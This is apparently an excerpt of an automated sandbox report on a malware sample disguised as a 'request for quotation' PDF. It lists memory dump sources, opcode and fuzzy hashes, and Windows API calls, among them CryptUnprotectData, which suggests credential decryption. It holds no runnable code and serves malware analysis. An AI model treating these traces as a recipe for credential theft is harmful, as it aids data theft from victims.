                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                  • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                  • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                                                  • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                  • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:10.3%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:0.7%
                                                                                                                                  Total number of Nodes:303
                                                                                                                                  Total number of Limit Nodes:31

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DispatchMessage
                                                                                                                                  • String ID: $z=8$$z=8$$z=8$$z=8
                                                                                                                                  • API String ID: 2061451462-2894072396
                                                                                                                                  • Opcode ID: 2cc81013ff7bcd114b4c979662ed67b3dacf2e713b486d0bac04577270c1d76d
                                                                                                                                  • Instruction ID: 1f3e8bbd6f852c37c6c5216e0dcebffa84483fd9faaabbcc83e78677ae78abe1
                                                                                                                                  • Opcode Fuzzy Hash: 2cc81013ff7bcd114b4c979662ed67b3dacf2e713b486d0bac04577270c1d76d
                                                                                                                                  • Instruction Fuzzy Hash: B5F1F979A00209CFEB04DFA9C984BADBBF1BF88304F558559E409AB365DB74ED45CB80

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                                                  • API String ID: 0-1229222154
                                                                                                                                  • Opcode ID: 62a2af1f899266e12456d38cdd114f6838589e21c2c95607f0ff4d43600bb640
                                                                                                                                  • Instruction ID: 89f1e99bb7555a50af553ce9d50351944eacdbe1314f2fa52c71a903fcd4de7c
                                                                                                                                  • Opcode Fuzzy Hash: 62a2af1f899266e12456d38cdd114f6838589e21c2c95607f0ff4d43600bb640
                                                                                                                                  • Instruction Fuzzy Hash: 5391E774E00218DFDB14DFA9D994A9DBBF2BF89300F14C16AE409AB365DB349945CF50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (o]q$4']q$4']q$4']q
                                                                                                                                  • API String ID: 0-875651895
                                                                                                                                  • Opcode ID: e17ee925be0c9d95674729cb51f0e87dac21dabc34a3f49fb98bc03e8c033fd1
                                                                                                                                  • Instruction ID: 51adc00f259631d5cab4d7301834ec5121a594475381eb6c1882bef33211e195
                                                                                                                                  • Opcode Fuzzy Hash: e17ee925be0c9d95674729cb51f0e87dac21dabc34a3f49fb98bc03e8c033fd1
                                                                                                                                  • Instruction Fuzzy Hash: C4A26E71A04209DFCB15CFA8D994AAEBBF2BF88310F15856AE405DB361D734ED41CBA1

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (o]q$(o]q$,aq$,aq
                                                                                                                                  • API String ID: 0-1947289240
                                                                                                                                  • Opcode ID: e2f3f9350bf2bed430863cb9b4a057e48cd8509d3743f6c3fb7dc401782e39bf
                                                                                                                                  • Instruction ID: b06a7036923acf7d96db6f93bca9c93a347d6793444682eb907d6be048bb9188
                                                                                                                                  • Opcode Fuzzy Hash: e2f3f9350bf2bed430863cb9b4a057e48cd8509d3743f6c3fb7dc401782e39bf
                                                                                                                                  • Instruction Fuzzy Hash: CB023D30A00219DFCB55CFA9C984AAEBBF2FF49314F55806AE805AB361D732DD41CB61
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Te]q
                                                                                                                                  • API String ID: 0-52440209
                                                                                                                                  • Opcode ID: 94fc5e09a02cb1c1aeae3652342a693112f3564128da8f914932bccdfc2bda9b
                                                                                                                                  • Instruction ID: c2c341a600568ccc1ca847b054129e673bf41baeacd0cc2b4bbce27c98e53c91
                                                                                                                                  • Opcode Fuzzy Hash: 94fc5e09a02cb1c1aeae3652342a693112f3564128da8f914932bccdfc2bda9b
                                                                                                                                  • Instruction Fuzzy Hash: 0D82E374A00229CFDB25DF64D994BADBBB2FF89300F1084A9D80967365DB359E82CF54
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Te]q
                                                                                                                                  • API String ID: 0-52440209
                                                                                                                                  • Opcode ID: 3e1f181ed8fbd52bd84aedc82d1e4f72027b8bbe244f0a6e78cd1240c1ace1a5
                                                                                                                                  • Instruction ID: e2d7203f7167a40ab57995d90c0e76af6a439d39f91dd9359256361f9548daf9
                                                                                                                                  • Opcode Fuzzy Hash: 3e1f181ed8fbd52bd84aedc82d1e4f72027b8bbe244f0a6e78cd1240c1ace1a5
                                                                                                                                  • Instruction Fuzzy Hash: 8072F374A00219CFDB24DF64D954BADBBB2FF89301F1084A9D809A73A5DB319E82CF54
                                                                                                                                  APIs
                                                                                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 37CADA45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320521794.0000000037CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37CA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37ca0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CryptDataUnprotect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 834300711-0
                                                                                                                                  • Opcode ID: 291115f2cd77ed5cc0a848aa22bc08d447f96721984a5dfe348fc7889f745ebe
                                                                                                                                  • Instruction ID: 325e409d2b4d6357cd13b402c85b3753dd6f9ad604df57dfe6d45b259f7321a1
                                                                                                                                  • Opcode Fuzzy Hash: 291115f2cd77ed5cc0a848aa22bc08d447f96721984a5dfe348fc7889f745ebe
                                                                                                                                  • Instruction Fuzzy Hash: D61119B6800249EFDB10CF99C945BDEBFF5EF48320F148419E618A7210C739A554DFA5
                                                                                                                                  APIs
                                                                                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 37CADA45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320521794.0000000037CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37CA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37ca0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CryptDataUnprotect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 834300711-0
                                                                                                                                  • Opcode ID: 462ab6bbc7aedb495eacc541c1ab7b3ecb0cabaae822564534ad60915e46e426
                                                                                                                                  • Instruction ID: 0c2bd9880e0d0256038be19bc3b92bc940767ce3b4965073dacf0a7c001fe33c
                                                                                                                                  • Opcode Fuzzy Hash: 462ab6bbc7aedb495eacc541c1ab7b3ecb0cabaae822564534ad60915e46e426
                                                                                                                                  • Instruction Fuzzy Hash: 9D1116B6800249EFDB10CF99C945BDEBFF4EF48320F148419E618A7210C739A994DFA5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 91e262bee7fb69d6e7d98038c7d87fdfdecc5060bf50eff2109873692eaff962
                                                                                                                                  • Instruction ID: c992a9641b93db0bcc7a36c13a33b692c0b1eb21141798d39c7f0231a6063c93
                                                                                                                                  • Opcode Fuzzy Hash: 91e262bee7fb69d6e7d98038c7d87fdfdecc5060bf50eff2109873692eaff962
                                                                                                                                  • Instruction Fuzzy Hash: A872BC74E012288FEB64DF69C980BD9FBB2BB49311F5491EAD409A7351DB34AE81CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320521794.0000000037CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37CA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37ca0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 12e65acd7b0b077fdacfe89b07272df9cd39c8e5b7483b7cea693ab8a52a64b4
                                                                                                                                  • Instruction ID: 607e97c3170eaf615e4ccb3b547d326d46335377da40de45844d30f721959007
                                                                                                                                  • Opcode Fuzzy Hash: 12e65acd7b0b077fdacfe89b07272df9cd39c8e5b7483b7cea693ab8a52a64b4
                                                                                                                                  • Instruction Fuzzy Hash: 4BE1D274E01218CFEB64CFA9D984B9DBBB2BF49301F1081AAD408B7291DB355E85CF55
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320521794.0000000037CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37CA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37ca0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6a5c0f28f8568e957d3663a353db3ca7d149f6c0d7bda91b78bb1027cd7c37c6
                                                                                                                                  • Instruction ID: d8a65f3fcecd60fb43744c60af2cbc069d32c9bd416f33b1575b90df938eae6f
                                                                                                                                  • Opcode Fuzzy Hash: 6a5c0f28f8568e957d3663a353db3ca7d149f6c0d7bda91b78bb1027cd7c37c6
                                                                                                                                  • Instruction Fuzzy Hash: 88C1A074E00218CFDB54DFA5C994BADBBB2FF89301F1080A9D809A7365DB359A85CF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320521794.0000000037CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37CA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37ca0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9655ee6a58e74ed7cb43e3c45324a19bb08c1a4ac008924fc43a1ea5930d4936
                                                                                                                                  • Instruction ID: e47ff91909581c1497e78d61af60e6c36ba2ea3f157de4dff479949f9d6a8211
                                                                                                                                  • Opcode Fuzzy Hash: 9655ee6a58e74ed7cb43e3c45324a19bb08c1a4ac008924fc43a1ea5930d4936
                                                                                                                                  • Instruction Fuzzy Hash: 3BA10574D00209CFDB14DFA9C994BDDBBB1FF88315F208269E408AB2A2DB749985CF55
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320521794.0000000037CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37CA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
Strings
Memory Dump Source
• Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
Similarity
• API ID:
• String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
• API String ID: 0-1435242062
• Opcode ID: 0fd37004ec828581c8d7b31da8613938de9b7760b1790d002e4d8f523db2a02e
• Instruction ID: caabe4c0faeba338710fb054b1ec6bdd15ef3693f61b048f02a82dc84ccb3671
• Opcode Fuzzy Hash: 0fd37004ec828581c8d7b31da8613938de9b7760b1790d002e4d8f523db2a02e
• Instruction Fuzzy Hash: A9125A30A006099FCB54CF68D994AAEBBF6FF48314F15855AE845DB361DB31ED41CB60

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 383C09FE
                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 383C0A3B
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 383C0A78
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 383C0AD1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                  • Opcode ID: 223aa49003247e1134b3dbb1d697029791f847819589b8acfd3d3705fbc7eb4f
                                                                                                                                  • Instruction ID: bb2f6ef1729f46c125547ed43d78d18f2f4e27cf68f47fa99fc2e70bd9347001
                                                                                                                                  • Opcode Fuzzy Hash: 223aa49003247e1134b3dbb1d697029791f847819589b8acfd3d3705fbc7eb4f
                                                                                                                                  • Instruction Fuzzy Hash: EB5154B4900789DFDB44DFAAC548BEEBBF1EF89300F20845AE019A7361D7389945CB65

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 383C09FE
                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 383C0A3B
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 383C0A78
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 383C0AD1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                  • Opcode ID: c74ebc298b3b2231483b25d7085ef37e63eef630fedefafb2ce84c266a40e633
                                                                                                                                  • Instruction ID: 8f69aa51b93938a958f7604bab04b263fa6831b734598d6736a7b84259855017
                                                                                                                                  • Opcode Fuzzy Hash: c74ebc298b3b2231483b25d7085ef37e63eef630fedefafb2ce84c266a40e633
                                                                                                                                  • Instruction Fuzzy Hash: E95143B4900649DFDB14DFAAC548BEEBBF5EF88300F208459E019A7361D7389980CBA5

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Xaq$Xaq$Xaq$Xaq
                                                                                                                                  • API String ID: 0-4015495023
                                                                                                                                  • Opcode ID: d5d9ed64beaf389d7d95140af0fe15dd8ebdf87532464f92aeaebd1665e1531e
                                                                                                                                  • Instruction ID: 173e9a2aaef72ce4cfaa10e5650278987ce5aa1d3fe96fd8f56b67e893a6a44d
                                                                                                                                  • Opcode Fuzzy Hash: d5d9ed64beaf389d7d95140af0fe15dd8ebdf87532464f92aeaebd1665e1531e
                                                                                                                                  • Instruction Fuzzy Hash: C2225FFAD6D7E55BC712CB306879295BFF0AA22208B1E4DCED0C092193D7A5C486C767

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Haq$Haq
                                                                                                                                  • API String ID: 0-4016896955
                                                                                                                                  • Opcode ID: 1a54f2a058873874c485c29b0fd9d337ab794f5e42dda5022bf1c39f26885e44
                                                                                                                                  • Instruction ID: 84d23a0f937a554a4642472ab16584ab23cfa6bef0fe4b8339ea05c6d58b12e7
                                                                                                                                  • Opcode Fuzzy Hash: 1a54f2a058873874c485c29b0fd9d337ab794f5e42dda5022bf1c39f26885e44
                                                                                                                                  • Instruction Fuzzy Hash: 41B1BE347047108FCB259F28D854B7E7BE6AF89301F14456AE846CB3A5DB34CC45DBA1

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,aq$,aq
                                                                                                                                  • API String ID: 0-2990736959
                                                                                                                                  • Opcode ID: 3daf4b63d2c583684c5cc0c2701e3eedd11b7769aed97467325e859e2ca41a8d
                                                                                                                                  • Instruction ID: 66e921d1502de60113a55ad072c11596945590ac506e1cb5018fbc809d10ad91
                                                                                                                                  • Opcode Fuzzy Hash: 3daf4b63d2c583684c5cc0c2701e3eedd11b7769aed97467325e859e2ca41a8d
                                                                                                                                  • Instruction Fuzzy Hash: 5481A134A00A058FCB54CF69DC949AEB7F2BF88316B65816AD805DB365DB31EC41CFA1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q$4']q
                                                                                                                                  • API String ID: 0-3120983240
                                                                                                                                  • Opcode ID: 4cd50aa81d5c74e1f37cc8943966684ffa76487ca64aef5718a9580677befce4
                                                                                                                                  • Instruction ID: c4e029d61987c54034cd3e925760b543b3606213390b257715b34f62a07d727f
                                                                                                                                  • Opcode Fuzzy Hash: 4cd50aa81d5c74e1f37cc8943966684ffa76487ca64aef5718a9580677befce4
                                                                                                                                  • Instruction Fuzzy Hash: 7B517070B043058FCB64DB69C990ABEB7E6AF88300F15C96AE502DB356DE35DD418BB1

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q$4']q
                                                                                                                                  • API String ID: 0-3120983240
                                                                                                                                  • Opcode ID: 445975291fb990080ee3cbeee63bfc8cb3631a936dcf6fb777868354287ca156
                                                                                                                                  • Instruction ID: 3f30083c479664e4ff1bed2c7fa6bd64498131a04deeae9ad51c0ee62ad8902c
                                                                                                                                  • Opcode Fuzzy Hash: 445975291fb990080ee3cbeee63bfc8cb3631a936dcf6fb777868354287ca156
                                                                                                                                  • Instruction Fuzzy Hash: C4518F70A002099FCB05EFA8D995A9EBBB2FF89300F108565D045BB266DB35AD45CFA1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Xaq$Xaq
                                                                                                                                  • API String ID: 0-1488805882
                                                                                                                                  • Opcode ID: 882f76188f1b98f5566df5b1ff95808f65669872d4afa799ec8dd2c2ca940b63
                                                                                                                                  • Instruction ID: 2f7442d270e8aa4f1b1cd519cafee1aec3f8e922a09523c8aa00a507ab5e1cc1
                                                                                                                                  • Opcode Fuzzy Hash: 882f76188f1b98f5566df5b1ff95808f65669872d4afa799ec8dd2c2ca940b63
                                                                                                                                  • Instruction Fuzzy Hash: 19319031B103258BDB6C4A6A999427EB6EABFE4310F18443BE906D3394DF74CC4596B1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $]q$$]q
                                                                                                                                  • API String ID: 0-127220927
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q$4']q
                                                                                                                                  • API String ID: 0-3120983240
                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 383C0222
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 383C0222
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 383C0222
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                  APIs
                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 383C1E81
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallProcWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2714655100-0
                                                                                                                                  APIs
                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 383C0C4F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                  APIs
                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 383C0C4F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Timer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2870079774-0
                                                                                                                                  APIs
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 383CD445
                                                                                                                                  Memory Dump Source
